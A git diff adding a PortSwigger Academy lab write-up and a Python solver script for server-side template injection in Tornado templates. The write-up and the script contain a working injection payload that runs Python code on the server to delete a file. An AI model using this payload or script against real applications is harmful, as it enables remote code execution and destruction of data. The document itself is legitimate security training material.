Basic server-side template injection (code context)

18_server_side_template_injection/Basic_server-side_template_injection_(code_context)/README.md

@@ -0,0 +1,89 @@
+# Write-up: Basic server-side template injection (code context) @ PortSwigger Academy
+
+![logo](img/logo.png)
+
+This write-up for the lab *Basic server-side template injection (code context)* is part of my walk-through series for [PortSwigger's Web Security Academy](https://portswigger.net/web-security).
+
+**Learning path**: Advanced topics → Server-side template injection
+
+Lab-Link: <https://portswigger.net/web-security/server-side-template-injection/exploiting/lab-server-side-template-injection-basic-code-context>  
+Difficulty: PRACTITIONER  
+Python script: [script.py](script.py)  
+
+## Lab description
+
+![Lab description](img/lab_description.png)
+
+## Steps
+
+### Analysis
+
+As usual, the first step is to analyze the functionality of the lab application. In this lab, it is a blog website to which I am provided credentials.
+
+The public page does not show anything interesting. When I post a comment it will appear as anonymous but it does not appear to contain something I want.
+
+I continue to log in as `wiener`. On my account page, I can change my email and set a preferred name. I guess it will be used as the user name when posting something on the blog:
+
+![](img/my_account.png)
+
+Changing the email address does not lead to anything substantial. Changing the `preferred name` indeed changes the name of comments posted:
+
+![](img/shown_name.png)
+
+What is more interesting though is the request that is sent when changing the preferred name:
+
+![](img/request_change_preferred_name.png)
+
+The value of the name argument appears to contain some reference to a data structure: `user.name` or, in case of the other options, `user.nickname` and `user.first_name`.
+
+A secure way would be to use the client-provided value just as a plain index in a lookup table without actually using it directly. More often than not this is not the case though. The input, with more or less sanitization applied to it, is used in actual logic and might cause havoc.
+
+---
+
+### The theory
+
+The lab description mentions tornado templates so I check out its [documentation](https://www.tornadoweb.org/en/stable/template.html). In it, I find some basic information:
+
+![](img/template_basics.png)
+
+![](img/template_syntax.png)
+
+As a starting point I will now assume two things about the name value from the `POST` request:
+
+1. It is either not sanitized at all or not sufficiently sanitized
+2. It is used directly in the template that generates the HTML of the comments
+
+If these assumptions are true, then I will be able to inject my own code by terminating the template value with `}}` and adding some own expression with `{{own_expression`. The closing `}}` are already in place so I don't provide them.
+
+I try this out by sending the POST request into Burp Repeater and changing the display name to `user.name}}{{2*3` to test whether I can invoke a math operation:
+
+![](img/request_manipulated_math.png)
+
+The request goes through and I reload the blog page with my comment. It now reads
+
+![](img/manipulated_comment_name.png)
+
+This confirms that I can inject expressions into the template.
+
+---
+
+### The malicious payload
+
+According to the documentation, the `{{own_expression}}` syntax can only be used for expressions. So for including my own code, like an import, I need to use the `{% code %}` syntax.
+
+I use my math injection from above and add a code block between the two expressions: `user.name}}{%import+os;os.unlink("/home/carlos/morale.txt")%}{{2*3`. This way it keeps the syntax valid but executes my arbitrary code in the middle:
+
+![](img/malicious_request.png)
+
+
+I reload the comments page and the lab updates to 
+
+![Lab solved](img/success.png)
+
+---
+
+**Note**: If you posted more than one comment on that page, you'll still solve the lab but receive this error:
+
+![](img/error.png)
+
+This is expected. The HTML generation for the first comment deletes the file, when the next comment is processed it errors out.

18_server_side_template_injection/Basic_server-side_template_injection_(code_context)/script.py

@@ -0,0 +1,116 @@
+#!/usr/bin/env python3
+# Basic server-side template injection (code context)
+# Lab-Link: https://portswigger.net/web-security/server-side-template-injection/exploiting/lab-server-side-template-injection-basic-code-context
+# Difficulty: PRACTITIONER
+from bs4 import BeautifulSoup
+import requests
+import sys
+import time
+import urllib3
+urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
+proxies = {'http': 'http://127.0.0.1:8080', 'https': 'http://127.0.0.1:8080'}
+
+
+def get_csrf_token(client, url):
+    r = client.get(url)
+    soup = BeautifulSoup(r.text, 'html.parser')
+    return soup.find('input', attrs={'name': 'csrf'})['value']
+
+
+def login(client, host, username, password):
+    url = f'{host}/login'
+    token = get_csrf_token(client, url)
+    data = {'csrf': token,
+            'username': username,
+            'password': password}
+    res = client.post(url, data=data)
+    return f'Your username is: {username}' in res.text
+
+
+def get_random_post_id(client, host):
+    r = client.get(host)
+    try:
+        soup = BeautifulSoup(r.text, 'html.parser')
+        first_post = soup.find('div', attrs={'class': 'blog-post'})
+        # first_post contains the full div of the first post
+        # ID extracted from <a href="/post?postId=4"><img src="/image/blog/posts/42.jpg"/></a>
+        postID = first_post.find_next('a')['href'].split('=')[1]
+    except TypeError:
+        return None
+    return postID
+
+
+def post_comment(client, host, postID):
+    url = f'{host}/post'
+    data = {
+        'csrf': get_csrf_token(client, f'{url}?postId={postID}'),
+        'postId': postID,
+        'comment': 'SomeComment'
+    }
+    if client.post(f'{url}/comment', data=data, allow_redirects=False).status_code != 302:
+        return None
+    return True
+
+
+def change_display_name(client, host):
+    url = f'{host}/my-account'
+    data = {
+        'csrf': get_csrf_token(client, f'{url}'),
+        'blog-post-author-display': 'user.name}}{%import os;os.unlink("/home/carlos/morale.txt")%}{{2*3'
+    }
+    if client.post(f'{url}/change-blog-post-author-display', data=data, allow_redirects=False).status_code != 302:
+        return None
+    return True
+
+
+def main():
+    print('[+] Basic server-side template injection (code context)')
+    try:
+        host = sys.argv[1].strip().rstrip('/')
+    except IndexError:
+        print(f'Usage: {sys.argv[0]} <HOST>')
+        print(f'Exampe: {sys.argv[0]} http://www.example.com')
+        sys.exit(-1)
+
+    with requests.Session() as client:
+        client.verify = False
+        client.proxies = proxies
+
+        if not login(client, host, 'wiener', 'peter'):
+            print(f'[-] Failed to log in as wiener')
+            sys.exit(-2)
+        print(f'[+] Log in as wiener')
+
+        if not change_display_name(client, host):
+            print(f'[-] Failed to change display name')
+            sys.exit(-3)
+        print(f'[+] Change display name')
+
+        postID = get_random_post_id(client, host)
+        if postID is None:
+            print(f'[-] Failed to extract a valid post ID')
+            sys.exit(-4)
+        print(f'[+] Extract valid post ID: {postID}')
+
+        if not post_comment(client, host, postID):
+            print(f'[-] Failed to post a comment in post {postID}')
+            sys.exit(-5)
+        print(f'[+] Post a comment in post {postID}')
+
+        url = f'{host}/post?postId={postID}'
+        if client.get(url).status_code != 200:
+            print(f'[-] Failed to refresh comment page')
+            sys.exit(-6)
+        print(f'[+] Refresh comment page')
+
+        # I had some times issues getting the proper result, so wait briefly before checking
+        time.sleep(2)
+        if 'Congratulations, you solved the lab!' not in client.get(f'{host}').text:
+            print(f'[-] Failed to solve lab')
+            sys.exit(-9)
+
+        print(f'[+] Lab solved')
+
+
+if __name__ == "__main__":
+    main()

README.md

@@ -38,7 +38,7 @@ So I create the scripts to learn about python and how to use it to interact with
 | 16 | WebSockets | :heavy_check_mark: 1/1 | :heavy_check_mark: 2/2 | - |
 |    | **Advanced topics** ||||
 | 17 | Insecure deserialization | :heavy_check_mark: 1/1 | :heavy_multiplication_x: 5/6 | :heavy_multiplication_x: 0/3 |
-| 18 | Server-side template injection | - | :heavy_multiplication_x: 1/5 | :heavy_multiplication_x: 0/2 |
+| 18 | Server-side template injection | - | :heavy_multiplication_x: 2/5 | :heavy_multiplication_x: 0/2 |
 | 19 | Web cache poisoning | - | :heavy_multiplication_x: 0/9 | :heavy_multiplication_x: 0/4 |
 | 20 | HTTP Host header attacks | :heavy_check_mark: 2/2 | :heavy_multiplication_x: 0/4 | :heavy_multiplication_x: 0/1 |
 | 21 | HTTP request smuggling | - | :heavy_multiplication_x: 1/15 | :heavy_multiplication_x: 0/7 |